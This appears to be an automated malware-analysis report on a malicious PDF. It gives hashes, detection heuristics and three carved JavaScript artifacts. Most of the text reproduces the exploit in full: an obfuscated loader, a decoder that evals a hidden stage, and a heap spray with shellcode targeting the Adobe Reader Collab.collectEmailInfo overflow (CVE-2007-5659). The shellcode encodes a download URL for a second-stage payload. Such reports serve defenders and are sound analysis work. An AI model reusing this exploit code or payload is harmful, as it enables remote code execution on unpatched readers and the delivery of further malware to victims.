Malicious PDF — malware analysis report

Static analysis result for SHA-256 06e653a1ff4ef171…

MALICIOUS

PDF

Size: 11.4 KB
Authoring application: Microsoft Word for Microsoft 365
First seen: 2026-06-07
MD5: 6afb5f1e455dbc015d99e4ceb3c304cd
SHA-1: a43a525950ed21d030b4c4f2a0266acf9d81fa93
SHA-256: 06e653a1ff4ef1715dfd62cca43471d2489e6de24f328b21d475aa91ecc1df2f
Risk Score: 350

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9999

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 | critical | CVE exact | CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action | low | 4 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) | high | CVE likely | PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var t8T_db = new Array();var P_A_sns7 = 0;var I_7__Q5Uh5V_JWh = "";function pXb_Lr(x1C5J__Mo, p35quI_eLPV_2sj){var y58ror05O = p35quI_eLPV_2sj.toString();var oN4_g6QJJJW_8E = "";for(var KL_t_20__CE = 0; KL_t_20__CE < y58ror05O.length; KL_t_20__CE++) {var Fuo7aRm = parseInt(y58ror05O.substr(KL_t_20__CE, 1));if (!isNaN(Fuo7aRm)) {Fuo7aRm = Fuo7aRm.toString(16);if (Fuo7aRm.length == 1) { Fuo7aRm = "0" + Fuo7aRm; }else if (Fuo7aRm.length != 2) { Fuo7aRm = "00"; }oN4_g6QJJJW_8E = Fuo7aRm + oN4_g6QJJJ …
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       z = y = app[h.replace(/[aviezjl]/g, '')];
      var tmp = 'syncAEEotScan'; y = 0;   z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( {  nPage: 0 }) ;   var s = p[0]; s = s['sub' + 'ject']; var  l =   s.replace(/[zhyg]/g, '%')  ; s =  unescape ( l  ) ;app[h.replace(/[czomdqs]/g, '')]( s);
     s =  ''; z  = 1;
  • PDF exploit shellcode contains an embedded download URL | high | PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35905 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35905
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://beancountercity.in/cgi-bin/uiq/eH198cf0b1V0100f060006R654a16cd102T778f0ba5203l0019 | Referenced by PDF JavaScript

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x19B | 352 bytes
SHA-256: d8a6b4ad1abf04d0c4a4f89535cfb57f7312edef25c443f4e844c8ec9d0929dd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var z; var y; 
 var h = 'edvoazcl'; 
	  z = y = app[h.replace(/[aviezjl]/g, '')]; 
	 var tmp = 'syncAEEotScan'; y = 0; 	 z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( {  nPage: 0 }) ;   var s = p[0]; s = s['sub' + 'ject']; var  l =   s.replace(/[zhyg]/g, '%')  ; s =  unescape ( l  ) ;app[h.replace(/[czomdqs]/g, '')]( s);
 s =  ''; z  = 1;
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2FE | 11824 bytes
SHA-256: 53249077197e9c5ec7d533521ea65605fcec5d4a93cecfd453d7ceee18c734ee
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function QM15_Qn5L__7(Gv_5IF4_N_X6s48, BnkOR_1nfYU__2N){var j26__w6d_05g_M = arguments.callee;var Mmcy3NVe = 0;var R1N_4p_5g = 512;j26__w6d_05g_M = j26__w6d_05g_M.toString();try {if (app) {Mmcy3NVe = 3;Mmcy3NVe--;}} catch(e) { }var yaV8_MJ_Kf6ky4 = new Array();if (Gv_5IF4_N_X6s48) { yaV8_MJ_Kf6ky4 = Gv_5IF4_N_X6s48;} else {var N16G1_1Lw2r_i = 0;var x55u11_v8IVF = 0;var d2i_0_4b_D2V = 49;d2i_0_4b_D2V--;while(x55u11_v8IVF < j26__w6d_05g_M.length) {var u__F0Dr = 1;var D__614nw_Np = j26__w6d_05g_M.charCodeAt(x55u11_v8IVF);if (D__614nw_Np >= d2i_0_4b_D2V && D__614nw_Np <= (d2i_0_4b_D2V + 9)) {if (N16G1_1Lw2r_i == 4) { N16G1_1Lw2r_i = 0; }if (isNaN(yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i])) { yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] = 0; }yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] += D__614nw_Np;if (yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] > R1N_4p_5g) {yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] -= R1N_4p_5g;}N16G1_1Lw2r_i++;}x55u11_v8IVF++;}}N16G1_1Lw2r_i = 4;R1N_4p_5g = 256;while (N16G1_1Lw2r_i > 0) {var x55u11_v8IVF = N16G1_1Lw2r_i - 1;if (yaV8_MJ_Kf6ky4[x55u11_v8IVF] > R1N_4p_5g) {yaV8_MJ_Kf6ky4[x55u11_v8IVF] -= R1N_4p_5g;}N16G1_1Lw2r_i--;}var kG6B__k = 0;var xfT__15 = "";var W1h6wyh = 0;var u_Bk61yD_b_5oI7 = 0;var iw___26v4k_uRQ = 0;var Fl__2_G_8_r614g;var lyU_Al_hk_gV5 = 0;while(u_Bk61yD_b_5oI7 < BnkOR_1nfYU__2N.length) {var a_0_5X__k = BnkOR_1nfYU__2N.substr(u_Bk61yD_b_5oI7, 1) + "J";var AJs75vGFFcwX3 = parseInt(a_0_5X__k, 16);if (iw___26v4k_uRQ) {Fl__2_G_8_r614g += AJs75vGFFcwX3;if (kG6B__k == 4) {kG6B__k -= 4;}var B_35E_2_YG4Q_s = Fl__2_G_8_r614g;B_35E_2_YG4Q_s = B_35E_2_YG4Q_s - (lyU_Al_hk_gV5 + 2) * yaV8_MJ_Kf6ky4[kG6B__k];if (B_35E_2_YG4Q_s < 0) {var QF_T_jHE7538 = Math.floor(B_35E_2_YG4Q_s / 256);B_35E_2_YG4Q_s = B_35E_2_YG4Q_s - QF_T_jHE7538 * 256;}B_35E_2_YG4Q_s = String.fromCharCode(B_35E_2_YG4Q_s);if (Mmcy3NVe == 1) {xfT__15 += AJs75vGFFcwX3;} else if (Mmcy3NVe == 2) {xfT__15 += B_35E_2_YG4Q_s;} else {xfT__15 += u_Bk61yD_b_5oI7;}kG6B__k++;lyU_Al_hk_gV5++;iw___26v4k_uRQ = 0;} else {Fl__2_G_8_r614g = AJs75vGFFcwX3 
* 16;iw___26v4k_uRQ = 1;}u_Bk61yD_b_5oI7++;}eval(xfT__15);return 0;}
legacy_pdfkit_stage_001.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2FE | 4861 bytes
SHA-256: b9942434aa3479656d839f504b01e7fb119ea2885e5a07483e1141e39b4f1cf4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var t8T_db = new Array();var P_A_sns7 = 0;var I_7__Q5Uh5V_JWh = "";function pXb_Lr(x1C5J__Mo, p35quI_eLPV_2sj){var y58ror05O = p35quI_eLPV_2sj.toString();var oN4_g6QJJJW_8E = "";for(var KL_t_20__CE = 0; KL_t_20__CE < y58ror05O.length; KL_t_20__CE++) {var Fuo7aRm = parseInt(y58ror05O.substr(KL_t_20__CE, 1));if (!isNaN(Fuo7aRm)) {Fuo7aRm = Fuo7aRm.toString(16);if (Fuo7aRm.length == 1) { Fuo7aRm = "0" + Fuo7aRm; }else if (Fuo7aRm.length != 2) { Fuo7aRm = "00"; }oN4_g6QJJJW_8E = Fuo7aRm + oN4_g6QJJJW_8E;}}while(oN4_g6QJJJW_8E.length < 8) { oN4_g6QJJJW_8E = "0" + oN4_g6QJJJW_8E; }var O5r1Re = x1C5J__Mo.toString(16);if (O5r1Re.length == 1) { O5r1Re = "0" + O5r1Re; }else if (O5r1Re.length != 2) { O5r1Re = "00"; }oN4_g6QJJJW_8E = "3" + O5r1Re + "P" + oN4_g6QJJJW_8E;return oN4_g6QJJJW_8E;}function E_m2UcOeoL(F1XM407Ku, O1a43FO){var n7QjKBG = new Array("");var U7a65An__hwY5 = F1XM407Ku;var VF_s_cUy;if ((VF_s_cUy = F1XM407Ku.lastIndexOf("%u00")) != -1) {if (VF_s_cUy + 6 == F1XM407Ku.length) {n7QjKBG[0] = F1XM407Ku.substr(VF_s_cUy + 4, 2);U7a65An__hwY5 = F1XM407Ku.substring(0, VF_s_cUy);}}VF_s_cUy = 1;for (KL_t_20__CE = 0; KL_t_20__CE < O1a43FO.length; KL_t_20__CE++) {var D__Kx62_i5u = O1a43FO.charCodeAt(KL_t_20__CE).toString(16);if (D__Kx62_i5u.length == 1) { D__Kx62_i5u = "0" + D__Kx62_i5u; }n7QjKBG[VF_s_cUy] = D__Kx62_i5u;VF_s_cUy++;}KL_t_20__CE = n7QjKBG[0].length ? 
0 : 1;n7QjKBG[VF_s_cUy] = "00";n7QjKBG[VF_s_cUy + 1] = "00";VF_s_cUy += 2;if ((n7QjKBG.length - KL_t_20__CE) % 2) {n7QjKBG[VF_s_cUy] = "00";}while(KL_t_20__CE < n7QjKBG.length) {U7a65An__hwY5 += "%u" + n7QjKBG[KL_t_20__CE + 1] + n7QjKBG[KL_t_20__CE];KL_t_20__CE += 2;}U7a65An__hwY5 += "%u0000";return U7a65An__hwY5;}function HW4XTId_L(Gb10B37QA, cmH4_B3S6__FqF8){while (Gb10B37QA.length*2<cmH4_B3S6__FqF8) {Gb10B37QA += Gb10B37QA;}Gb10B37QA = Gb10B37QA.substring(0,cmH4_B3S6__FqF8/2);return Gb10B37QA;}function mI85n_qT0f(a2faGD8Dp, T___i2, Y_ypmg4E3_e){var tC_bE_Q_7_0Cm = 0x0c0c0c0c;var Gb10B37QA = unescape(T___i2);var O1a43FO = pXb_Lr(a2faGD8Dp, Y_ypmg4E3_e);var n_V223iNe = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var F1XM407Ku = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6a70%u6272%u0044%u7468%u7074%u2f3a%u622f%u6165%u636e%u756f%u746e%u7265%u6963%u7974%u692e%u2f6e%u6763%u2d69%u6962%u2f6e%u6975%u2f71%u4865%u3931%u6338%u3066%u3162%u3056%u
3031%u6630%u3630%u3030%u3630%u3652%u3435%u3161%u6336%u3164%u3230%u3754%u3837%u3066%u6162%u3235%u3330%u306c%u3130%u0039";app.c4N6__3TL = unescape(E_m2UcOeoL(F1XM407Ku, O1a43FO));var Lt7u__2_047 = 0x400000;var lrV_p1hN = n_V223iNe.length * 2;var cmH4_B3S6__FqF8 = Lt7u__2_047 - (lrV_p1hN+0x38);Gb10B37QA = HW4XTId_L(Gb10B37QA, cmH4_B3S6__FqF8);var I1__i36_7Ec_8f = (tC_bE_Q_7_0Cm - 0x400000)/Lt7u__2_047;for (var W3y3R2POPP = 0; W3y3R2POPP < I1__i36_7Ec_8f; W3y3R2POPP++) {t8T_db[W3y3R2POPP] = Gb10B37QA + n_V223iNe;}}function mO8_jK78(){var kObh14npAO = "";for (KL_t_20__CE = 0; KL_t_20__CE < 12; KL_t_20__CE++) {kObh14npAO += unescape("%u0c0c%u0c0c");}var c___22I_L58_Y = "";for (KL_t_20__CE = 0; KL_t_20__CE < 750; KL_t_20__CE++) {c___22I_L58_Y += kObh14npAO;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: c___22I_L58_Y});app.clearTimeOut(P_A_sns7);}function YyH_kf_g4S(SAKC8e){var p_eGDi_7j = P_A_sns7;if ((SAKC8e >= 8 && SAKC8e < 8.11) || SAKC8e < 7.1) {mI85n_qT0f(23, "%u0c0c%u0c0c", SAKC8e);mO8_jK78();} if (p_eGDi_7j) {app.clearTimeOut(p_eGDi_7j);}}var Y_ypmg4E3_e = 0;var TB1Qq_v_w = app.plugIns;for (var Qi_RQK_a = 0; Qi_RQK_a < TB1Qq_v_w.length; Qi_RQK_a++) {var I_J_c04_Yq4 = TB1Qq_v_w[Qi_RQK_a].version;if (I_J_c04_Yq4 > Y_ypmg4E3_e) { Y_ypmg4E3_e = I_J_c04_Yq4; }}if (app.viewerVersion == 9.103 && Y_ypmg4E3_e < 9.13) {Y_ypmg4E3_e = 9.13;}app.d_Ru_03V5YEU_7 = YyH_kf_g4S;P_A_sns7 = app.setTimeOut("app.d_Ru_03V5YEU_7(" + Y_ypmg4E3_e.toString() + ")", 50);